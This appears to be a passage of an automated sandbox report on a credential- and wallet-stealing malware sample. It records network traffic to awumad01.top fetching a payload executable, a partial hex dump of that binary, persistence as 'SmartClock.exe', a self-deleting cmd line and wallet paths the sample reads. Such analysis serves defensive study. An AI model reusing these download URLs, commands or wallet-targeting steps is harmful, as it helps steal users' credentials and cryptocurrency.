Apr 12, 2021 15:12:17.420308113 CEST	1689	OUT	Data Raw: f9 f3 1e b5 ce 3e a4 32 fd 00 b7 8f a3 3a d8 e8 6a 6f 43 31 33 fb 27 27 ce 3e 48 d2 11 03 b1 43 14 1f 41 4b 92 3d e9 cf 81 9b 93 bc 1e 34 01 18 31 a4 00 bd 45 8a 9a e1 4c 62 58 ef b8 83 29 c1 aa 1e 05 75 54 9b de e0 86 67 01 c3 ab 19 3f 63 35 9d Data Ascii: >2:joC13''>HCAK=41ELbX)uTg?c5O?N<'_%)Tc~,G0+QE!*\eA+}J"P)S[:UDh4})uA$FLmxb?\|K6Wowt7
Apr 12, 2021 15:12:17.420334101 CEST	1692	OUT	Data Raw: 87 d2 f4 17 bf d5 18 7b 0e cb 0b 54 c8 67 02 66 5b 8d d6 f3 1f 1a f7 b8 87 c1 04 32 09 1b 46 e9 a5 3f 22 f4 64 1f 86 b7 26 a4 93 42 b9 03 76 27 17 36 20 b5 e5 5c ad e2 76 42 90 51 8e f3 b0 c3 7a 77 b3 e7 7e 77 d4 2a a7 6f 2a ce ff 9d 1d 2e 3b 9d Data Ascii: {Tgf[2F?"d&Bv'6 \vBQzw~wo.;#9c?[jN!T!]PQ$TNX2Gu5EtfaH~c=<De0Mylasb>j+ ]wQtsC8xx19Zpp`{v35q=
Apr 12, 2021 15:12:17.518408060 CEST	1723	IN	HTTP/1.1 200 OK Server: nginx/1.10.3 (Ubuntu) Date: Mon, 12 Apr 2021 13:12:17 GMT Content-Length: 3 Connection: close X-Powered-By: Express Data Raw: 6f 6b 21 Data Ascii: ok!

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.5	49719	8.209.66.205	80	C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe

Timestamp	kBytes transferred	Direction	Data
Apr 12, 2021 15:12:19.644112110 CEST	1724	OUT	GET /download.php?file=lv.exe HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: awumad01.top Connection: Keep-Alive
Apr 12, 2021 15:12:19.718657970 CEST	1724	IN	HTTP/1.1 302 Found Date: Mon, 12 Apr 2021 13:12:19 GMT Server: Apache/2.2.22 (@RELEASE@) X-Powered-By: PHP/5.3.3 Location: downfiles/lv.exe Content-Length: 0 Connection: close Content-Type: text/html

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.5	49720	8.209.66.205	80	C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe

Timestamp	kBytes transferred	Direction	Data
Apr 12, 2021 15:12:19.769709110 CEST	1725	OUT	GET /downfiles/lv.exe HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: awumad01.top Connection: Keep-Alive
Apr 12, 2021 15:12:19.834563971 CEST	1727	IN	HTTP/1.1 200 OK Date: Mon, 12 Apr 2021 13:12:19 GMT Server: Apache/2.2.22 (@RELEASE@) Last-Modified: Mon, 12 Apr 2021 02:46:58 GMT ETag: "320648-132ebb-5bfbd8703eb96" Accept-Ranges: bytes Content-Length: 1257147 Connection: close Content-Type: application/octet-stream Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 41 7b d1 6b 05 1a bf 38 05 1a bf 38 05 1a bf 38 0c 62 3c 38 06 1a bf 38 0c 62 2c 38 14 1a bf 38 05 1a be 38 a9 1a bf 38 1e 87 15 38 09 1a bf 38 1e 87 25 38 04 1a bf 38 1e 87 22 38 04 1a bf 38 52 69 63 68 05 1a bf 38 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 e4 e2 47 4f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 74 00 00 00 7a 07 00 00 42 00 00 af 38 00 00 00 10 00 00 00 90 00 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 06 00 00 00 05 00 00 00 00 00 00 00 00 e0 16 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 40 ac 00 00 b4 00 00 00 00 00 16 00 e8 c9 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 08 00 94 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 8c 72 00 00 00 10 00 00 00 74 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6e 2b 00 00 00 90 00 00 00 2c 00 00 00 78 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 9c 2b 07 00 00 c0 00 00 00 02 00 00 00 a4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 10 0e 00 00 f0 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 e8 c9 00 00 00 00 16 00 00 ca 00 00 00 a6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d6 0f 00 00 00 d0 16 00 00 10 00 00 00 b8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 8b ec 83 ec 5c 83 7d 0c 0f 74 2b 83 7d 0c 46 8b 45 14 75 0d 83 48 18 10 8b 0d b4 ea 47 00 89 48 04 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$A{k888b<88b,888888%88"88Rich8PELGOtzB8@@@`.textrt `.rdatan+,x@@.data+@.ndata.rsrc@@.reloc@BU\}t+}FEuHGH
Apr 12, 2021 15:12:19.834609985 CEST	1728	IN	Data Raw: 50 ff 75 10 ff 75 0c ff 75 08 ff 15 8c 92 40 00 e9 4b 01 00 00 53 56 8b 35 bc ea 47 00 57 8d 45 a4 50 ff 75 08 ff 15 90 92 40 00 83 65 f4 00 89 45 0c 8d 45 e4 50 ff 75 08 ff 15 94 92 40 00 8b 7d f0 83 65 f0 00 8b 1d 44 90 40 00 e9 89 00 00 00 0f Data Ascii: Puuu@KSV5GWEPu@eEEPu@}eD@FRVVU+MMEFQNUMMVTUFPEEPMH@EPEEPu@uE9}n~Xtev4L@
Apr 12, 2021 15:12:19.834629059 CEST	1729	IN	Data Raw: 40 04 56 85 c0 74 04 8b f0 eb 0c 8b 35 64 eb 47 00 81 c6 01 00 00 80 8d 45 08 50 a1 90 eb 47 00 0b 45 08 50 6a 00 6a 22 e8 d3 fe ff ff 50 56 ff 15 04 90 40 00 f7 d8 1b c0 f7 d0 23 45 08 5e 5d c2 04 00 cc 55 8b ec 81 ec ac 03 00 00 a1 b4 ea 47 00 Data Ascii: @Vt5dGEPGEPjj"PV@#E^]UGSVuWjY}UMi@i@EGE@E3]G$0@Rh@LEYYS@Ph@LYYSul9tjG9]tS<@
Apr 12, 2021 15:12:19.834642887 CEST	1731	IN	Data Raw: 74 10 8d 4d e0 51 83 c0 14 50 ff 15 64 90 40 00 8b c8 8b 45 08 83 c0 fd 0d 00 00 00 80 23 c1 f7 d8 1b c0 40 89 45 08 39 5d 08 75 06 56 e8 94 43 00 00 33 c0 83 7d 08 01 0f 95 c0 40 50 68 00 00 00 40 56 e8 9e 43 00 00 89 45 f8 83 f8 ff 0f 85 bf 00 Data Ascii: tMQPd@E#@E9]uVC3}@Ph@VCE9]uwVh@GYYhGW.EVhG#EuhAMWhGEEPhAAuhp@GY6Ht@h@@rGYVjuj.4}uEuVh@DG
Apr 12, 2021 15:12:19.834659100 CEST	1732	IN	Data Raw: e8 c1 f9 02 3b cb 74 1e 8d 55 f8 52 51 53 ff 75 08 ff 75 cc 50 57 ff 15 4c 92 40 00 f7 d8 1b c0 40 89 45 fc eb 43 ff 75 08 ff 75 cc 50 57 ff 15 88 92 40 00 eb 30 6a 01 e8 4f f4 ff ff 6a 12 8b f8 e8 46 f4 ff ff 0f b7 08 f7 d9 1b c9 23 c8 0f b7 07 Data Ascii: ;tURQSuuPWL@@ECuuPW@0jOjF#Q#Puu@E9]u3Pl@sUjY3PAPp@ZGPj3Pt@DQup@EPV@EEjPE
Apr 12, 2021 15:12:19.834673882 CEST	1733	IN	Data Raw: ff ff 6a 02 8b f8 e8 47 ef ff ff 6a cd 89 45 f8 e8 3d ef ff ff 6a 45 89 45 f0 e8 33 ef ff ff 57 89 45 bc e8 1f 38 00 00 85 c0 75 07 6a 21 e8 1f ef ff ff 8b 45 e4 8b c8 c1 f9 10 51 8b c8 c1 f9 08 be ff 00 00 00 23 ce 51 23 c6 50 ff 75 f0 ff 75 f8 Data Ascii: jGjE=jEE3WE8uj!EQ#Q#PuuWuh@e= EPh@jSh0@@;EURh @PE;EWPQPEEhpMPQ$M#tMPQR<MEQPR4Ef9t}M#WP
Apr 12, 2021 15:12:19.834690094 CEST	1735	IN	Data Raw: 1c 39 4d 08 74 06 83 7d 08 02 75 26 8b 45 e4 8b 4d bc 89 45 fc 33 c0 66 89 04 4e eb 1d ff 36 33 c0 39 5d e4 56 0f 94 c0 89 45 fc e8 09 35 00 00 eb 08 33 c0 66 89 06 89 4d fc 57 e9 60 ff ff ff 68 19 00 02 00 e8 c5 ea ff ff 6a 03 59 8b f8 e8 ae e9 Data Ascii: 9Mt}u&EME3fN639]VE53fMW`hjY3f;n M9]tQVPW@SSSSMQVPW @<3f@f9V4P@jXuuPl33f Wj@$@E9]
Apr 12, 2021 15:12:19.834712982 CEST	1736	IN	Data Raw: 45 d8 50 68 d0 92 40 00 a3 04 d2 46 00 e8 3f 33 00 00 83 c4 10 39 5d d8 74 0a e8 03 0f 00 00 e9 41 01 00 00 6a 01 e8 6a 31 00 00 e9 35 01 00 00 6a 01 e8 a7 e4 ff ff 50 68 84 9a 40 00 e9 97 e9 ff ff 33 c9 e8 7f e4 ff ff 89 45 08 3b 05 cc ea 47 00 Data Ascii: EPh@F?39]tAjj15jPh@3E;G=Ei @5G;\|uVWQQ+Mt3A4EuFP8NEM9]uB3 9]t9]tP=SS
Apr 12, 2021 15:12:19.834748030 CEST	1737	IN	Data Raw: 6a 64 50 ff 15 50 91 40 00 50 8d 85 68 ff ff ff 68 fc 9f 40 00 50 ff 15 48 92 40 00 83 c4 0c 8d 85 68 ff ff ff 50 6a 00 e8 b9 1a 00 00 89 7d f0 33 c0 3b f0 74 3f 39 45 10 75 20 50 8d 45 e8 50 56 ff 75 f4 ff 75 0c ff 15 54 91 40 00 85 c0 74 36 39 Data Ascii: jdPP@Phh@PH@hPj}3;t?9Eu PEPVuuT@t69uu1uACu)uE}979E,jj;tb9u}uVSuuE_^[u9u}uVpBSIWEPVSuT@t;uuu)u
Apr 12, 2021 15:12:19.834764957 CEST	1739	IN	Data Raw: 03 83 c6 02 0f b7 06 66 3b c5 0f 85 66 ff ff ff eb 1d 6a 08 8d 46 fc 55 50 e8 3c 48 00 00 83 c4 0c 83 c6 04 56 68 a8 30 4d 00 e8 14 26 00 00 bb c8 30 4e 00 53 68 04 20 00 00 ff 15 ac 90 40 00 e8 c1 fd ff ff 85 c0 75 24 68 ff 1f 00 00 53 ff 15 a8 Data Ascii: f;fjFUP<HVh0M&0NSh @u$hS@h(@S%hMp@t$@D$;u}9-Gt^UW"jh@Vt;sD$@;rn3fV,t1Vh0Mc%VhpMX%l$
Apr 12, 2021 15:12:19.876095057 CEST	1740	IN	Data Raw: 75 07 be ff 03 00 00 eb a3 33 f6 eb 9f 89 0d 88 6a 47 00 0f b7 00 50 57 e8 34 20 00 00 6a fe 68 a0 6a 47 00 e8 dc 28 00 00 50 ff 35 70 1d 44 00 ff 15 38 92 40 00 8b 35 c8 ea 47 00 8b 3d cc ea 47 00 eb 17 8b 06 4f 85 c0 74 0a 50 8d 46 18 50 e8 b0 Data Ascii: u3jGPW4 jhjG(P5pD8@5G=GOtPFP( @u_^][U}V5@uuhujhgu}u-uu@tjDu@3Pjheu3^]SH@UV3VVVVjt$$VV3;tWxWj@$

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe PID: 5964 Parent PID: 5616

General

Start time:	15:11:10
Start date:	12/04/2021
Path:	C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe'
Imagebase:	0x400000
File size:	749568 bytes
MD5 hash:	5E3189812E802C0FD68CE592CB1E1999
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.382370325.0000000000400000.00000040.00020000.sdmp, Author: Joe Security Rule: OlympicDestroyer_1, Description: OlympicDestroyer Payload, Source: 00000000.00000002.382370325.0000000000400000.00000040.00020000.sdmp, Author: kevoreilly Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.383574469.0000000005B00000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.231267121.0000000005BE0000.00000004.00000001.sdmp, Author: Joe Security Rule: OlympicDestroyer_1, Description: OlympicDestroyer Payload, Source: 00000000.00000003.231267121.0000000005BE0000.00000004.00000001.sdmp, Author: kevoreilly
Reputation:	low

Chronological Activities

Analysis Process: Murano.exe PID: 5520 Parent PID: 5964

General

Start time:	15:12:21
Start date:	12/04/2021
Path:	C:\Users\user\AppData\Local\Temp\Murano.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\AppData\Local\Temp\Murano.exe'
Imagebase:	0x400000
File size:	1257147 bytes
MD5 hash:	AFF6F8C7521796D3BC8FC1059DBE2409
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 31%, ReversingLabs
Reputation:	low

Chronological Activities

Analysis Process: cmd.exe PID: 6020 Parent PID: 5964

General

Start time:	15:12:22
Start date:	12/04/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\system32\cmd.exe' /c rd /s /q C:\Users\user\AppData\Local\Temp\UdRFIiqEaRrk & timeout 3 & del /f /q 'C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe'
Imagebase:	0x270000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 5568 Parent PID: 6020

General

Start time:	15:12:22
Start date:	12/04/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7ecfc0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: 4.exe PID: 2876 Parent PID: 5520

General

Start time:	15:12:22
Start date:	12/04/2021
Path:	C:\Users\user\AppData\Local\Temp\New Feature\4.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\New Feature\4.exe
Imagebase:	0x400000
File size:	328704 bytes
MD5 hash:	E99CED09C77FFEC9F09B33642E9B0E99
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 38%, ReversingLabs
Reputation:	low

Chronological Activities

Analysis Process: timeout.exe PID: 4188 Parent PID: 6020

General

Start time:	15:12:22
Start date:	12/04/2021
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	timeout 3
Imagebase:	0x13c0000
File size:	26112 bytes
MD5 hash:	121A4EDAE60A7AF6F5DFA82F7BB95659
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: vpn.exe PID: 4324 Parent PID: 5520

General

Start time:	15:12:23
Start date:	12/04/2021
Path:	C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe
Imagebase:	0x400000
File size:	1146832 bytes
MD5 hash:	0FDA9A85AEDF1487A6D58E4031F72E2D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 15%, ReversingLabs
Reputation:	low

Chronological Activities

Analysis Process: makecab.exe PID: 984 Parent PID: 4324

General

Start time:	15:12:25
Start date:	12/04/2021
Path:	C:\Windows\SysWOW64\makecab.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\System32\makecab.exe'
Imagebase:	0x2f0000
File size:	68608 bytes
MD5 hash:	D0D74264402D9F402615F22258330EC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: conhost.exe PID: 2900 Parent PID: 984

General

Start time:	15:12:26
Start date:	12/04/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7ecfc0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: SmartClock.exe PID: 1632 Parent PID: 2876

General

Start time:	15:12:26
Start date:	12/04/2021
Path:	C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe
Imagebase:	0x400000
File size:	328704 bytes
MD5 hash:	E99CED09C77FFEC9F09B33642E9B0E99
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 38%, ReversingLabs
Reputation:	low

Chronological Activities

Analysis Process: makecab.exe PID: 3620 Parent PID: 4324

General

Start time:	15:12:27
Start date:	12/04/2021
Path:	C:\Windows\SysWOW64\makecab.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\System32\makecab.exe'
Imagebase:	0x2f0000
File size:	68608 bytes
MD5 hash:	D0D74264402D9F402615F22258330EC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: conhost.exe PID: 6808 Parent PID: 3620

General

Start time:	15:12:28
Start date:	12/04/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7ecfc0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: SmartClock.exe PID: 6884 Parent PID: 904

General

Start time:	15:12:28
Start date:	12/04/2021
Path:	C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe
Imagebase:	0x400000
File size:	328704 bytes
MD5 hash:	E99CED09C77FFEC9F09B33642E9B0E99
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: makecab.exe PID: 5292 Parent PID: 4324

General

Start time:	15:12:29
Start date:	12/04/2021
Path:	C:\Windows\SysWOW64\makecab.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\System32\makecab.exe'
Imagebase:	0x2f0000
File size:	68608 bytes
MD5 hash:	D0D74264402D9F402615F22258330EC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: conhost.exe PID: 6788 Parent PID: 5292

General

Start time:	15:12:29
Start date:	12/04/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7ecfc0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: makecab.exe PID: 6728 Parent PID: 4324

General

Start time:	15:12:30
Start date:	12/04/2021
Path:	C:\Windows\SysWOW64\makecab.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\System32\makecab.exe'
Imagebase:	0x2f0000
File size:	68608 bytes
MD5 hash:	D0D74264402D9F402615F22258330EC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: conhost.exe PID: 852 Parent PID: 6728

General

Start time:	15:12:30
Start date:	12/04/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7ecfc0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: makecab.exe PID: 5240 Parent PID: 4324

General

Start time:	15:12:31
Start date:	12/04/2021
Path:	C:\Windows\SysWOW64\makecab.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\System32\makecab.exe'
Imagebase:	0x2f0000
File size:	68608 bytes
MD5 hash:	D0D74264402D9F402615F22258330EC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: conhost.exe PID: 5188 Parent PID: 5240

General

Start time:	15:12:32
Start date:	12/04/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7ecfc0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: SmartClock.exe PID: 5368 Parent PID: 3472

General

Start time:	15:12:34
Start date:	12/04/2021
Path:	C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe'
Imagebase:	0x400000
File size:	328704 bytes
MD5 hash:	E99CED09C77FFEC9F09B33642E9B0E99
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: makecab.exe PID: 5652 Parent PID: 4324

General

Start time:	15:12:34
Start date:	12/04/2021
Path:	C:\Windows\SysWOW64\makecab.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\System32\makecab.exe'
Imagebase:	0x2f0000
File size:	68608 bytes
MD5 hash:	D0D74264402D9F402615F22258330EC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: conhost.exe PID: 5696 Parent PID: 5652

General

Start time:	15:12:35
Start date:	12/04/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7ecfc0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: makecab.exe PID: 4660 Parent PID: 4324

General

Start time:	15:12:36
Start date:	12/04/2021
Path:	C:\Windows\SysWOW64\makecab.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\System32\makecab.exe'
Imagebase:	0x2f0000
File size:	68608 bytes
MD5 hash:	D0D74264402D9F402615F22258330EC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: conhost.exe PID: 6964 Parent PID: 4660

General

Start time:	15:12:36
Start date:	12/04/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7ecfc0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: cmd.exe PID: 5492 Parent PID: 4324

General

Start time:	15:12:37
Start date:	12/04/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\System32\cmd.exe' /c C:\Windows\System32\cmd.exe < Scoprirvi.eps
Imagebase:	0x7ff724f60000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: conhost.exe PID: 6988 Parent PID: 5492

General

Start time:	15:12:38
Start date:	12/04/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7ecfc0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe PID: 5964 Parent PID: 5616 SecuriteInfo.com.W32.AIDetect.malware1.24453.exeCOMMON

Executed Functions

Function 004176A8, Relevance: 159.0, APIs: 46, Strings: 44, Instructions: 1544COMMON

Download Yara Rule

APIs

ExpandEnvironmentStringsW.KERNEL32(%LocalAppData%\Coinomi,?,00000208), ref: 004177A0
ExpandEnvironmentStringsW.KERNEL32(%AppData%\waves-exchange,?,00000208), ref: 004177B3
ExpandEnvironmentStringsW.KERNEL32(%AppData%\Ledger Live\sqlite,?,00000208), ref: 004177C6
ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000208), ref: 0041780B
ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000208), ref: 004178DF
ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000208), ref: 004179B3
ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000208), ref: 00417ABA
ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000208), ref: 00417B8E
ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000208), ref: 00417C62
CreateDirectoryW.KERNEL32(?,00000000), ref: 00417D02
CreateDirectoryW.KERNEL32(?,00000000), ref: 00417D0D
CreateDirectoryW.KERNEL32(?,00000000), ref: 00417D18
